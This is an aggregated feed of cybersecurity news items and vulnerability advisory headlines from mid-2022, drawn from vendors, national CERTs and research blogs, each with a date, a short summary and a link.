Various scams and phishing campaigns continued actively in June. Network performance was good and there were no serious performance disruptions. Criminals exploited quickly a vulnerability in Microsoft support tools.

https://www.kyberturvallisuuskeskus.fi/en/kybersaa_06/2022
Protect Your Sensitive Data and Ensure Regulatory Compliance with Cato’s DLP
2022-07-18T07:54:25Z | 1658130865

The post Protect Your Sensitive Data and Ensure Regulatory Compliance with Cato’s DLP appeared first on Cato Networks.

https://www.catonetworks.com/resources/protect-your-sensitive-data-and-ensure-regulatory-compliance-with-catos-dlp/
Game On! Rooter Achieves Massive Esports Growth
2022-07-18T05:00:00Z | 1658120400

Learn how Rooter, India?s leading esports platform, achieved massive esports growth, delivering a gripping experience to players and fans alike.

https://www.akamai.com/blog/security/game-on-rooter-achieves-massive-esports-growth
Accusoft ImageGear PSD Header processing memory allocation out-of-bounds write vulnerability
2022-07-18T00:00:00Z | 1658102400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1526
Cato SSE 360: Finally, SSE with Total Visibility and Control
2022-07-17T05:55:00Z | 1658037300

The post Cato SSE 360: Finally, SSE with Total Visibility and Control appeared first on Cato Networks.

https://www.catonetworks.com/resources/cato-sse-360-finally-sse-with-total-visibility-and-control/
SonicWall Switch Post-Authenticated Remote Code Execution
2022-07-15T16:11:26Z | 1657901486

A vulnerability in SonicWall Switch 1.1.1.0-2s and earlier allows an authenticated malicious user to perform remote code execution in the host system. CVE: CVE-2022-2323 Last updated: July 15, 2022, 4:11 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0013
Foi publicado o Boletim n.º 2/2022, do Observatório de Cibersegurança
2022-07-15T00:00:00Z | 1657843200

O Boletim nº 2/2022 analisa as ameaças que resultam do cibercrime-como-serviço, uma realidade que tem adquirido particular relevância e que tem promovido a disseminação de incidentes, bem como dificuldades acrescidas à imputação de responsabilidades ao longo de toda a cadeia de cibercriminalidade.Como sempre, este Boletim também divulga notícias e publicações.Aceda ao documento aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135678/foi-publicado-o-boletim-n-22022-do-observatorio-de-ciberseguranca
I Want the Needle and the Haystack: YARA + Security Analytics for Incident Response
2022-07-15T00:00:00Z | 1657843200

I want the needle, and the haystack to go along with it. Attackers take advantage of siloed data and security tools to exploit systems using misconfigurations and move laterally. This lateral movement across different attack surfaces has attackers flowing between the control plane and data plane of your environment to escalate privileges and seek out targeted access.

https://www.first.org/blog/20220715_I_Want_the_Needle_and_the_Haystack_YARA_Security_Analytics_for_Incident_Response
I Want the Needle and the Haystack: YARA + Security Analytics for Incident Response
2022-07-15T00:00:00Z | 1657843200

I want the needle, and the haystack to go along with it. Attackers take advantage of siloed data and security tools to exploit systems using misconfigurations and move laterally. This lateral movement across different attack surfaces has attackers flowing between the control plane and data plane of your environment to escalate privileges and seek out targeted access.

https://www.first.org/blog/20220715_I_Want_the_Needle_and_the_Haystack_YARA_Security_Analytics_for_Incident_Response
SonicWall Hosted Email Security Capture ATP Bypass
2022-07-14T18:43:59Z | 1657824239

Improperly Implemented Security Check vulnerability in the SonicWall Hosted Email Security leads to bypass of Capture ATP security service in the appliance. CVE: CVE-2022-2324 Last updated: July 14, 2022, 6:43 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0014
Cybersecurity Is a Team Sport: 3 Takeaways from Israel?s Cyber Week
2022-07-14T13:00:00Z | 1657803600

The future of cybersecurity relies on successful international partnerships and collaboration to ultimately thwart cybercriminals and cyberattacks.

https://www.akamai.com/blog/news/cybersecurity-three-takeaways-from-israel-cyber-week
Google Chrome WebGPU DoBufferDestroy kDirect allocation use-after-free vulnerability
2022-07-14T00:00:00Z | 1657756800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1508
CVE-2022-0902
2022-07-14T00:00:00Z | 1657756800

A path traversal vulnerability exists in the implementation of the Totalflow TCP protocol in ABB G5 products. Read more: "An Oil and Gas Weak Spot: Flow Computers"

https://claroty.com/team82/disclosure-dashboard/cve-2022-0902
OpenSSL c_rehash script allows command injection CVE-2022-1292
2022-07-13T17:32:45Z | 1657733565

A critical vulnerability (CVE-2022-1292) was found in OpenSSL c_rehash script. This is due to shell metacharacters not being properly sanitized, resulting in command injection. An attacker could execute arbitrary commands with the privileges of the script.After review, it has been determined that vulnerability tracked as CVE-2022-1292 is not applicable to the SonicWall product suite. However, SonicWall has decided to update the impacted OpenSSL package to the fixed version (OpenSSL 1.1.1o) out of an abundance of caution in the following products identified in the "Affected Product(s)" list below: CVE: CVE-2022-1292 Last updated: Oct. 14, 2022, 8:42 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011
The Kit That Wants It All: Scam Mimics PayPal?s Known Security Measures
2022-07-13T13:00:00Z | 1657717200

Identity theft affects millions of people every year. See this piece on a scam purporting to be PayPal in an effort to gain total identity theft.

https://www.akamai.com/blog/security-research/paypal-phishing-scam-mimics-known-security-measures
High Threat Security Alert (A22-07-07): Multiple Vulnerabilities in Microsoft Products (July 2022)
2022-07-13T04:00:00Z | 1657684800

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-07-08): Multiple Vulnerabilities in Adobe Reader/Acrobat
2022-07-13T04:00:00Z | 1657684800

Security updates are released for Adobe Reader and Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-07-09): Multiple Vulnerabilities in VMware Products
2022-07-13T04:00:00Z | 1657684800

VMware has published a security advisory to address multiple vulnerabilities in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
Adobe Acrobat Reader DC event value use-after-free
2022-07-13T00:00:00Z | 1657670400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1525
Adobe Acrobat Reader DC overlapping annotations type confusion vulnerability
2022-07-13T00:00:00Z | 1657670400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1516
AMA: What’s the Difference Between SD-WAN and SASE?
2022-07-12T09:15:42Z | 1657617342

The post AMA: What’s the Difference Between SD-WAN and SASE? appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-registration-whats-the-difference-between-sdwan-and-sase
Summer means a peak in invoicing scams – how to protect yourself against fraud
2022-07-08T11:55:36Z | 1657281336

Fraud and scams concerning the financial transactions in companies tend to become more common during the summer holiday season. Make sure that all employees in your organisation are familiar with your payment rules and conventions.

https://www.kyberturvallisuuskeskus.fi/en/news/summer-means-peak-invoicing-scams-how-protect-yourself-against-fraud
Summer means a peak in invoicing scams – how to protect yourself against fraud
2022-07-08T11:55:36Z | 1657281336

Fraud and scams concerning the financial transactions in companies tend to become more common during the summer holiday season. Make sure that all employees in your organisation are familiar with your payment rules and conventions.

https://www.kyberturvallisuuskeskus.fi/en/news/summer-means-peak-invoicing-scams-how-protect-yourself-against-fraud
Eestis toimus juunis 241 mõju omavat küberintsidenti
2022-07-08T06:00:00Z | 1657260000

Riigi Infosüsteemi Amet (RIA) registreeris möödunud kuul 241 mõjuga küberintsidenti, mis on viimase poole aasta kõrgeim näitaja.

https://ria.ee/uudised/eestis-toimus-juunis-241-moju-omavat-kuberintsidenti
Meet Tedd Smith: Solutions Engineer at Akamai
2022-07-07T13:00:00Z | 1657198800

Meet Tedd Smith, solutions engineer at Akamai. He discusses today?s media-streaming landscape and how he crafts solutions for higher-quality user experiences.

https://www.akamai.com/blog/developers/meet-tedd-smith-solutions-engineer
Not All Backbones are Created Equal
2022-07-07T12:52:04Z | 1657198324

It’s no secret that many enterprises are reevaluating their WAN. In some cases, it might be an MPLS network, which is no longer suitable (or affordable) for the modern digital business. In other cases, it might be a global SD-WAN deployment, which relied too much on the unpredictable Internet.   Regardless of why the company needs... The post Not All Backbones are Created Equal appeared first on Cato Networks.

https://www.catonetworks.com/blog/not-all-backbones-are-created-equal/
Trendid ja tähelepanekud küberruumis – II kvartal 2022
2022-07-07T06:00:00Z | 1657173600

RIA kvartaliülevaade keskendub kolme kuu olulisematele kübersündmustele.

https://ria.ee/uudised/trendid-ja-tahelepanekud-kuberruumis-ii-kvartal-2022
Olukord küberruumis – juuni 2022
2022-07-07T06:00:00Z | 1657173600

Juunis registreerisime 241 mõjuga intsidenti, mis on viimase poole aasta kõige kõrgem näitaja.

https://ria.ee/uudised/olukord-kuberruumis-juuni-2022
High Threat Security Alert (A22-07-03): Multiple Vulnerabilities in Microsoft Edge (Chromium-based)
2022-07-07T04:00:00Z | 1657166400

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-07-04): Multiple Vulnerabilities in Cisco Products
2022-07-07T04:00:00Z | 1657166400

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-07-05): Multiple Vulnerabilities in Android
2022-07-07T04:00:00Z | 1657166400

Google has released Android Security Bulletin July 2022 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-07-06): Multiple Vulnerabilities in OpenSSL
2022-07-07T04:00:00Z | 1657166400

OpenSSL has released 1.1.1q and 3.0.5 to fix the vulnerabilities in various versions of OpenSSL.

https://www.govcert.gov.hk/en/alerts_detail.php
Ransomware Attack on Airline Industry: Turning Point for India and Others
2022-07-05T13:00:00Z | 1657026000

Cybercriminals are attacking organizations in the APAC region with ransomware. Learn how to implement security strategies to mitigate and recover from attacks.

https://www.akamai.com/blog/security/ransomware-attack-airline-industry
NCSC urges organisations to prepare for the long haul on Russia-Ukraine
2022-07-05T07:17:44Z | 1657005464

Guidance issued advises how organisations can avoid staff burnout during an extended period of heightened cyber threat.

https://www.ncsc.gov.uk/news/ncsc-urges-organisations-to-prepare-for-the-long-haul-on-russia-ukraine
RIA otsib Eesti Infoturbestandardi portaalile arenduspartnereid
2022-07-05T06:00:00Z | 1657000800

Riigi Infosüsteemi Amet (RIA) otsib partnereid, kes arendavad edasi ja hooldavad Eesti Infoturbestandardi (E-ITS) portaali ning loovad vajadusel portaali tarbeks uusi lahendusi. Raamhanke maksumus on miljon eurot ning leping sõlmitakse neljaks aastaks.

https://ria.ee/uudised/ria-otsib-eesti-infoturbestandardi-portaalile-arenduspartnereid
High Threat Security Alert (A22-07-02): Multiple Vulnerabilities in Google Chrome
2022-07-05T04:00:00Z | 1656993600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Economia da Cibersegurança é o tema de nova publicação do Observatório de Cibersegurança
2022-07-05T00:00:00Z | 1656979200

O primeiro Relatório Cibersegurança em Portugal, tema Economia, estuda a dimensão económica da cibersegurança, centrando-se em especial na problemática da cibersegurança nas empresas. Do lado da oferta, dimensiona e caracteriza o setor da cibersegurança em Portugal. Do lado da procura, caracteriza e analisa os níveis de exposição e as políticas, práticas e protocolos de cibersegurança nas empresas portuguesas, especialmente nas de pequena e média dimensão. Em termos metodológicos, recorreu-se a uma exaustiva desk research e à análise de dados secundários de diversas fontes. Os dados primários utilizados resultam de inquéritos promovidos pelo Observatório de Cibersegurança do CNCS. Para consultar o documento, clique aqui.Para conhecer outros documentos do Observatório de Cibersegurança do CNCS, aceda à seguinte página.

https://dyn.cncs.gov.pt/pt/detalhe/art/135674/economia-da-ciberseguranca-e-o-tema-de-nova-publicacao-do-observatorio-de-ciberseguranca
Security Alert (A22-07-01): Vulnerability in Microsoft Edge (Chromium-based)
2022-07-04T04:00:00Z | 1656907200

Microsoft released a security update to address a vulnerability in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
Bloomfield Robotics Wins Funding to Feed People on Earth and in Space
2022-07-01T13:00:00Z | 1656680400

Akamai awarded Bloomfield Robotics $1M in cloud, compute, and security products to grow their AI business and help feed the world.

https://www.akamai.com/blog/news/bloomfield-robotics-wins-funding
libmagic: The Blathering
2022-07-01T11:00:27Z | 1656673227

A couple of years ago we released PolyFile: a utility to identify and map the semantic structure of files, including polyglots, chimeras, and schizophrenic files. It’s a bit like file, binwalk, and Kaitai Struct all rolled into one. PolyFile initially used the TRiD definition database for file identification. However, […]

https://blog.trailofbits.com/2022/07/01/libmagic-the-blathering/
Cybersecurity Defenders United in Global Fight Against Cyber Threats
2022-07-01T00:00:00Z | 1656633600

Over the past five days, 1,000 specialists representing six continents united in the cyber-crime fight at the Forum of Incident Response and Security Teams (FIRST) conference in Dublin, Ireland From how Ukraine is dealing with cyber attacks against its critical infrastructure, to the rapidly growing access to online child sexual abuse material and the sophisticated approaches to ransomware, phishing, and online fraud as well discussing cooperation with the United Nations and with INTERPOL and law enforcement– no stone was left unturned for delegates working together to protect societies world-wide

https://www.first.org/newsroom/releases/20220701
Cybersecurity Defenders United in Global Fight Against Cyber Threats
2022-07-01T00:00:00Z | 1656633600

Over the past five days, 1,000 specialists representing six continents united in the cyber-crime fight at the Forum of Incident Response and Security Teams (FIRST) conference in Dublin, Ireland From how Ukraine is dealing with cyber attacks against its critical infrastructure, to the rapidly growing access to online child sexual abuse material and the sophisticated approaches to ransomware, phishing, and online fraud as well discussing cooperation with the United Nations and with INTERPOL and law enforcement– no stone was left unturned for delegates working together to protect societies world-wide

https://www.first.org/newsroom/releases/20220701
A Typical Day as a Trail of Bits Engineer-Consultant
2022-06-30T13:00:29Z | 1656594029

Wherever you are in the world, a typical day as a Trail of Bits Engineer-Consultant means easing into your work. Here’s a short video showing some of our European colleagues describing a typical day as a Trail of Bits Engineer-Consultant: You generally set your own hours, to provide at least a couple of hours of […]

https://blog.trailofbits.com/2022/06/30/a-typical-day-as-a-trail-of-bits-engineer-consultant/
Robustel R1510 web_server action endpoints OS command injection vulnerabilities
2022-06-30T00:00:00Z | 1656547200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1572
Robustel R1510 web_server ajax endpoints OS command injection vulnerabilities
2022-06-30T00:00:00Z | 1656547200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1573
Robustel R1510 web_server /action/remove/ API data removal vulnerability
2022-06-30T00:00:00Z | 1656547200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1571
Robustel R1510 clish art2 command execution vulnerability
2022-06-30T00:00:00Z | 1656547200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1570
Libasõnumite abil on inimestelt varastatud kümneid tuhandeid eurosid
2022-06-29T10:45:28Z | 1656499528

Viimastel nädalatel on Riigi Infosüsteemi Ametile teatatud liba-mobiilisõnumitest, mis näiliselt tulevad SEB, Swedbanki või DHLi nimelt. Inimesed on petusõnumitest ajendatud sammude tõttu kaotanud tuhandeid eurosid.

https://ria.ee/uudised/libasonumite-abil-inimestelt-varastatud-kumneid-tuhandeid-eurosid
Mobiil-ID taotlemine muutub lihtsamaks ja kiiremaks
2022-06-29T07:00:00Z | 1656486000

2. juulist muutub Mobiil-ID taotlemine oluliselt lihtsamaks ja kiiremaks, sest enam ei pea Mobiil-ID-d politsei kodulehel aktiveerima ja kõik saab tehtud mobiilioperaatorite juures. Ka pärast 2.07.2022 on Mobiil-ID endiselt riikliku garantiiga isikutunnistus. Siiani väljastatud Mobiil-IDd on jõus nende kehtivusaja lõpuni.

https://ria.ee/uudised/mobiil-id-taotlemine-muutub-lihtsamaks-ja-kiiremaks
Security Alert (A22-06-13): Multiple Vulnerabilities in Firefox
2022-06-29T04:00:00Z | 1656475200

Mozilla has published the advisories (MFSA2022-24 and MFSA2022-25) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
The Trail of Bits Hiring Process
2022-06-28T13:00:10Z | 1656421210

When engineers apply to Trail of Bits, they’re often surprised by how straightforward and streamlined our hiring process is. After years of experience, we’ve cut the process to its bedrock, so that it’s candidate focused, quick, and effective. Here’s a short video showing some of our European colleagues discussing some cool things they’re working on […]

https://blog.trailofbits.com/2022/06/28/the-trail-of-bits-hiring-process/
Akamai?s Observations of Confluence Zero Day (CVE-2022-26134)
2022-06-28T13:00:00Z | 1656421200

The Atlassian Confluence vulnerability is here to stay. See Akamai's research into the stats two weeks after the advisory was released.

https://www.akamai.com/blog/security-research/atlassian-confluence-vulnerability-observations
Evaluating SASE Vendors? Here’s Why You Should Compare Apples and Oranges
2022-06-28T12:17:27Z | 1656418647

There is a common cliché that is often thrown around during SASE vendor discussions “you are comparing apples to oranges.” This phrase is typically used when looking at functions or features of a product, but often is used by people looking to discredit a solution offered by a competitor. It is natural, however, as every... The post Evaluating SASE Vendors? Here’s Why You Should Compare Apples and Oranges appeared first on Cato Networks.

https://www.catonetworks.com/blog/evaluating-sase-vendors-heres-why-you-should-compare-apples-and-oranges/
Cyber weather in May included much needed sunshine
2022-06-28T10:20:16Z | 1656411616

In May, cyber weather was less rainy than earlier in the spring. The fact that the FluBot malware subsided marked an important improvement in the cyber security of people in Finland. The Finnish Transport and Communications Agency issued a new regulation that includes more effective tools for tackling scam calls. The number of denial-of-service (DoS) attacks reported to the National Cyber Security Centre Finland in May was also smaller than usual.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_05/2022
Cyber weather in May included much needed sunshine
2022-06-28T10:20:16Z | 1656411616

In May, cyber weather was less rainy than earlier in the spring. The fact that the FluBot malware subsided marked an important improvement in the cyber security of people in Finland. The Finnish Transport and Communications Agency issued a new regulation that includes more effective tools for tackling scam calls. The number of denial-of-service (DoS) attacks reported to the National Cyber Security Centre Finland in May was also smaller than usual.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_05/2022
Commercial cyber capabilities must be used legally and responsibly, says UK NCSC CEO
2022-06-28T08:54:36Z | 1656406476

Lindy Cameron's speech at Tel Aviv Cyber Week emphasised the importance of partnerships and international regulation of sophisticated cyber capabilities.

https://www.ncsc.gov.uk/news/lindy-cameron-at-tel-aviv-cyber-week
Mapping NIST Cybersecurity Framework (CSF) to the Cato SASE Cloud
2022-06-26T07:14:43Z | 1656227683

The post Mapping NIST Cybersecurity Framework (CSF) to the Cato SASE Cloud appeared first on Cato Networks.

https://www.catonetworks.com/resources/nist-compliance-to-cato-sase/
Managing risk in blockchain deployments
2022-06-24T13:00:09Z | 1656075609

Do you need a blockchain? And if so, what kind? Trail of Bits has released an operational risk assessment report on blockchain technology. As more businesses consider the innovative advantages of blockchains and, more generally, distributed ledger technologies (DLT), executives must decide whether and how to adopt them. Organizations adopting these systems must understand and […]

https://blog.trailofbits.com/2022/06/24/managing-risk-in-blockchain-deployments/
What?s New for Developers: June 2022
2022-06-24T13:00:00Z | 1656075600

Read about our recent Terraform updates and managed database services, our latest Meet the Developer articles, and stream videos on edge computing.

https://www.akamai.com/blog/developers/whats-new-for-developers-june-2022
Security Alert (A22-06-12): Multiple Vulnerabilities in Microsoft Edge (Chromium-based)
2022-06-24T04:00:00Z | 1656043200

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
Bots Are Scalping Israeli Government Services
2022-06-23T13:00:00Z | 1655989200

Bots can be used for good, but can also be nefarious. In this post, see Akamai's research on the Israeli Gamken bot copycat.

https://www.akamai.com/blog/security-research/bots-scalping-israeli-government-services
The Relentless Evolution of DDoS Attacks
2022-06-23T13:00:00Z | 1655989200

Explore how DDoS attacks are practically unrecognizable from those of the past few years thanks to constant innovation in the threat landscape

https://www.akamai.com/blog/security/relentless-evolution-of-ddos-attacks
Solving Real-World Challenges – Your Pathway to SASE
2022-06-23T09:50:19Z | 1655977819

We are witnessing a tremendous shift in mindset regarding technology’s relationship to the business. As IT leaders learned during Covid, business challenges are IT challenges, and IT challenges are business challenges. As digitization continues to advance, these leaders continue to face an array of challenges, and the solutions they choose will determine their success or... The post Solving Real-World Challenges – Your Pathway to SASE appeared first on Cato Networks.

https://www.catonetworks.com/blog/solving-real-world-challenges-your-pathway-to-sase/
Security Alert (A22-06-11): Multiple Vulnerabilities in Cisco Products
2022-06-23T04:00:00Z | 1655956800

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Relatório Riscos & Conflitos de 2022 publicado pelo Observatório de Cibersegurança do CNCS
2022-06-23T00:00:00Z | 1655942400

A edição de 2022 do Relatório Riscos & Conflitos, do Observatório de Cibersegurança do CNCS, analisa os principais incidentes, cibercrimes e agentes de ameaça a afetar o ciberespaço de interesse nacional, bem como algumas tendências que podem marcar o futuro a este nível. O documento centra-se sobretudo no ano de 2021, mas procura também perspetivar 2022 e 2023. A análise apresentada baseia-se na sistematização de dados e perspetivas partilhados por várias instituições parceiras, tendo em conta referenciais internacionais e a diversidade de contributos, de modo a apresentar uma visão integrada e o mais completa possível dos riscos e conflitos no ciberespaço de interesse nacional. Para consultar o documento principal, clique aqui. Para aceder à versão curta (Relatório em 15m), clique aqui.Para conhecer outros documentos do Observatório de Cibersegurança do CNCS, aceda à seguinte página.

https://dyn.cncs.gov.pt/pt/detalhe/art/135673/relatorio-riscos-conflitos-de-2022-publicado-pelo-observatorio-de-ciberseguranca-do-cncs
CVE-2022-2121
2022-06-23T00:00:00Z | 1655942400

CWE-476 : NULL POINTER DEREFERENCE The affected product has a NULL pointer dereference vulnerability while processing DICOM files, which may result in a denial-of-service condition.

https://claroty.com/team82/disclosure-dashboard/cve-2022-2121
CVE-2022-2120
2022-06-23T00:00:00Z | 1655942400

CWE-23: RELATIVE PATH TRAVERSAL The affected product's service class user (SCU) is vulnerable to relative path traversal, allowing an attacker to write DICOM files into arbitrary directories under controlled names. This could allow remote code execution.

https://claroty.com/team82/disclosure-dashboard/cve-2022-2120
CVE-2022-2119
2022-06-23T00:00:00Z | 1655942400

CWE-22: IMPROPER LIMITATION OF A PATHNAME TO A RESTRICTED DIRECTORY ('PATH TRAVERSAL') The affected product's service class provider (SCP) is vulnerable to path traversal, allowing an attacker to write DICOM files into arbitrary directories under controlled names. This could allow remote code execution.

https://claroty.com/team82/disclosure-dashboard/cve-2022-2119
"Information security in 2021" reviews the key events of the year and describes the strong growth in cyber security incidents
2022-06-22T10:21:27Z | 1655893287

The number of information security events addressed by the National Cyber Security Centre Finland (NCSC-FI) at Traficom rocketed last year. The NCSC-FI is increasingly focusing on the prevention of serious cyber incidents that have a major impact on society.

https://www.kyberturvallisuuskeskus.fi/en/news/information-security-2021-reviews-key-events-year-and-describes-strong-growth-cyber-security
"Information security in 2021" reviews the key events of the year and describes the strong growth in cyber security incidents
2022-06-22T10:21:27Z | 1655893287

The number of information security events addressed by the National Cyber Security Centre Finland (NCSC-FI) at Traficom rocketed last year. The NCSC-FI is increasingly focusing on the prevention of serious cyber incidents that have a major impact on society.

https://www.kyberturvallisuuskeskus.fi/en/news/information-security-2021-reviews-key-events-year-and-describes-strong-growth-cyber-security
Security Alert (A22-06-10): Multiple Vulnerabilities in Google Chrome
2022-06-22T04:00:00Z | 1655870400

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Are blockchains decentralized?
2022-06-21T09:00:39Z | 1655802039

A new Trail of Bits research report examines unintended centralities in distributed ledgers Blockchains can help push the boundaries of current technology in useful ways. However, to make good risk decisions involving exciting and innovative technologies, people need demonstrable facts that are arrived at through reproducible methods and open data. We believe the risks inherent […]

https://blog.trailofbits.com/2022/06/21/are-blockchains-decentralized/
Cato’s Ransomware Lab Births Network-based Ransomware Prevention
2022-06-21T07:01:41Z | 1655794901

As you might have heard, Cato introduced network-based ransomware protection today. Using machine learning algorithms and the deep network insight of the Cato SASE Cloud, we’re able to detect and prevent the spread of ransomware across networks without having to deploy endpoint agents. Infected machines are identified and immediately isolated for remediation. Of course, this... The post Cato’s Ransomware Lab Births Network-based Ransomware Prevention appeared first on Cato Networks.

https://www.catonetworks.com/blog/catos-ransomware-lab-births-network-based-ransomware-prevention/
Announcing the new Trail of Bits podcast
2022-06-21T02:00:42Z | 1655776842

Trail of Bits has launched a podcast. The first five-episode season is now available for download. The podcast and its RSS feed are available at trailofbits.audio, and you may subscribe on all major podcast outlets, including Apple iTunes, Spotify, Gaana, Google Podcasts, Amazon Music, and many others. Listening to our podcast is like having a […]

https://blog.trailofbits.com/2022/06/20/announcing-the-new-trail-of-bits-podcast/
Information security phenomena that changed the world
2022-06-20T09:12:12Z | 1655716332

Major cyber security storms always shake the world for some time, but each stormy spell has taught us valuable lessons. Our new series of videos presents five major cyber incidents from the past decade.

https://www.kyberturvallisuuskeskus.fi/en/news/information-security-phenomena-changed-world
Information security phenomena that changed the world
2022-06-20T09:12:12Z | 1655716332

Major cyber security storms always shake the world for some time, but each stormy spell has taught us valuable lessons. Our new series of videos presents five major cyber incidents from the past decade.

https://www.kyberturvallisuuskeskus.fi/en/news/information-security-phenomena-changed-world
Exercises perfect preparedness
2022-06-20T09:09:19Z | 1655716159

Threats and disturbances concerning cyber security are currently a hot topic. Deputy Director-General Sauli Pahlman at the NCSC-FI at Traficom emphasises the importance of cooperation when it comes to being prepared for cyber security incidents.

https://www.kyberturvallisuuskeskus.fi/en/news/exercises-perfect-preparedness
Exercises perfect preparedness
2022-06-20T09:09:19Z | 1655716159

Threats and disturbances concerning cyber security are currently a hot topic. Deputy Director-General Sauli Pahlman at the NCSC-FI at Traficom emphasises the importance of cooperation when it comes to being prepared for cyber security incidents.

https://www.kyberturvallisuuskeskus.fi/en/news/exercises-perfect-preparedness
Traficom and Finnish telecommunications operators join forces to help customers by stopping caller ID spoofing
2022-06-20T09:07:22Z | 1655716042

The Finnish Transport and Communications Agency Traficom adopted on 16 May 2022 an updated version of its Regulation 28. It imposes new obligations on telecommunications operators to prevent caller ID spoofing and the transfer of scam calls to recipients. The objective of the updated Regulation is to prevent the use of Finnish telephone numbers in international cybercrime and to reduce the number of scam calls from abroad. The obligations to prevent the use of spoofed numbers enter into force gradually: they become applicable to telephone numbers in fixed networks from 1 July 2022 and to numbers in mobile networks from 2 October 2023.

https://www.kyberturvallisuuskeskus.fi/en/news/traficom-and-finnish-telecommunications-operators-join-forces-help-customers-stopping-caller
Traficom and Finnish telecommunications operators join forces to help customers by stopping caller ID spoofing
2022-06-20T09:07:22Z | 1655716042

The Finnish Transport and Communications Agency Traficom adopted on 16 May 2022 an updated version of its Regulation 28. It imposes new obligations on telecommunications operators to prevent caller ID spoofing and the transfer of scam calls to recipients. The objective of the updated Regulation is to prevent the use of Finnish telephone numbers in international cybercrime and to reduce the number of scam calls from abroad. The obligations to prevent the use of spoofed numbers enter into force gradually: they become applicable to telephone numbers in fixed networks from 1 July 2022 and to numbers in mobile networks from 2 October 2023.

https://www.kyberturvallisuuskeskus.fi/en/news/traficom-and-finnish-telecommunications-operators-join-forces-help-customers-stopping-caller
Alert on FluBot campaign removed
2022-06-20T09:03:44Z | 1655715824

The FluBot malware epidemic has subsided. The malware was taken down in an international law enforcement operation, and the infrastructure used to spread the malware is currently inactive. Malware spread by text messages may be seen again in the future, but there is currently no need for an alert.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/ttn_02062022
Alert on FluBot campaign removed
2022-06-20T09:03:44Z | 1655715824

The FluBot malware epidemic has subsided. The malware was taken down in an international law enforcement operation, and the infrastructure used to spread the malware is currently inactive. Malware spread by text messages may be seen again in the future, but there is currently no need for an alert.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/ttn_02062022
Scenario bank for cyber exercises - support for planning the contents of an exercise
2022-06-20T08:46:18Z | 1655714778

Our new service regarding the scenario bank for cyber exercises contains previously published and new scenario ideas to support the planning of an cyber exercise. The aim of the scenario bank is to facilitate ideas for and contents of an exercise.

https://www.kyberturvallisuuskeskus.fi/en/news/scenario-bank-cyber-exercises-support-planning-contents-exercise
Scenario bank for cyber exercises - support for planning the contents of an exercise
2022-06-20T08:46:18Z | 1655714778

Our new service regarding the scenario bank for cyber exercises contains previously published and new scenario ideas to support the planning of an cyber exercise. The aim of the scenario bank is to facilitate ideas for and contents of an exercise.

https://www.kyberturvallisuuskeskus.fi/en/news/scenario-bank-cyber-exercises-support-planning-contents-exercise
New guideline helps organisations who have become a victim of ransomware
2022-06-20T08:41:22Z | 1655714482

The risk of being a victim of ransomware has increased significantly in recent years. Our new guideline gives advice for situations where ransomware threatens the operations of an organisation.

https://www.kyberturvallisuuskeskus.fi/en/news/new-guideline-helps-organisations-who-have-become-victim-ransomware
New guideline helps organisations who have become a victim of ransomware
2022-06-20T08:41:22Z | 1655714482

The risk of being a victim of ransomware has increased significantly in recent years. Our new guideline gives advice for situations where ransomware threatens the operations of an organisation.

https://www.kyberturvallisuuskeskus.fi/en/news/new-guideline-helps-organisations-who-have-become-victim-ransomware
Leading Computer Security Experts to Gather in Dublin for Critical Discussions at World-Renowned Conference
2022-06-20T00:00:00Z | 1655683200

Over 1,000 specialists representing six continents to participate in the Forum of Incident Response and Security Teams (FIRST) five-day program in Ireland Google’s Maddie Stone addresses the 0-day cyber-attack in-the-wild and how combating the unknown can help future online defense

https://www.first.org/newsroom/releases/20220620
Leading Computer Security Experts to Gather in Dublin for Critical Discussions at World-Renowned Conference
2022-06-20T00:00:00Z | 1655683200

Over 1,000 specialists representing six continents to participate in the Forum of Incident Response and Security Teams (FIRST) five-day program in Ireland Google’s Maddie Stone addresses the 0-day cyber-attack in-the-wild and how combating the unknown can help future online defense

https://www.first.org/newsroom/releases/20220620
What's the Value of a Key-Value Store?
2022-06-17T13:00:00Z | 1655470800

Learn about the benefits and drawbacks of a key-value store: a data structure designed for storing and returning values associated with keys as unique identifiers.

https://www.akamai.com/blog/edge/whats-the-value-of-a-key-value-store
Meet Josh Johnson: Senior Enterprise Architect
2022-06-16T13:00:00Z | 1655384400

A love of technology and coding brought Josh Johnson to Akamai. Learn what he thinks a developer-first approach means for the Akamai developer community.

